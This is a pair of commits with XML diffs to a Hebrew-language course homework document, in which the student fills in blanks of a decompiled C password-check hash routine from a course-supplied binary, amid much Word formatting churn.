<commit_message>
reverse engineered checkPassword on hw3_dry
</commit_message>
<xml_diff>
--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -3516,7 +3516,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>_______</w:t>
+        <w:t>s != NULL</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3594,7 +3594,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x = *s -</w:t>
+        <w:t xml:space="preserve"> x = *s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3604,7 +3614,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ______</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'a'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3662,7 +3682,37 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x&gt;</w:t>
+        <w:t>(x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3672,7 +3722,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>____</w:t>
+        <w:t>25</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3856,7 +3906,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">(y &gt; </w:t>
+        <w:t>(y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3866,7 +3916,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>_____</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>~(x)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4030,7 +4090,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">         y = </w:t>
+        <w:t>         y =</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4040,7 +4100,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>__________</w:t>
+        <w:t xml:space="preserve"> 26y + *s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4174,7 +4234,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>____________</w:t>
+        <w:t>y == hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>

</xml_diff>

<commit_message>
solved part 1 of dry part
</commit_message>
<xml_diff>
--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -453,8 +453,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> טאוב</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>טאוב</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -469,8 +479,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה באת"מ</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>באת"מ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -535,6 +555,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -542,13 +563,32 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>המוצרף</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -558,13 +598,31 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump, readelf</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -608,6 +666,7 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -615,6 +674,7 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -694,8 +754,17 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Reverse Engenering</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Engenering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -805,14 +874,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -934,14 +1023,34 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf -h verySecretProgram</w:t>
-      </w:r>
+        <w:t>readelf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>verySecretProgram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -1952,7 +2061,22 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>000000000939f103</w:t>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>939f103</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2104,6 +2228,7 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2111,6 +2236,7 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2133,8 +2259,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>להשתחזר</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2290,7 +2426,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2350,6 +2520,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2370,6 +2541,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2398,6 +2570,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2428,6 +2601,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2494,8 +2668,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c = *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2574,6 +2760,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2594,6 +2781,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2642,6 +2830,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2662,6 +2851,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2746,8 +2936,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c){</w:t>
-      </w:r>
+        <w:t>(c</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2794,7 +2996,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; 1</w:t>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2806,6 +3019,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2884,6 +3098,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2904,6 +3119,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2958,8 +3174,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s++;</w:t>
-      </w:r>
+        <w:t>          s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3054,8 +3282,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sum;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>sum;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3140,7 +3380,41 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3178,8 +3452,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>char* copy = s;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">char* copy = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>s;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3226,7 +3512,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPasswordAux(s) &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPasswordAux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3238,6 +3546,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3258,6 +3567,7 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3316,6 +3626,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3336,6 +3647,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3390,8 +3702,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>     s = copy;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">     s = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>copy;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3440,6 +3764,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3460,6 +3785,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3488,6 +3814,7 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3508,6 +3835,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3624,7 +3952,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a'</w:t>
+        <w:t>'a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
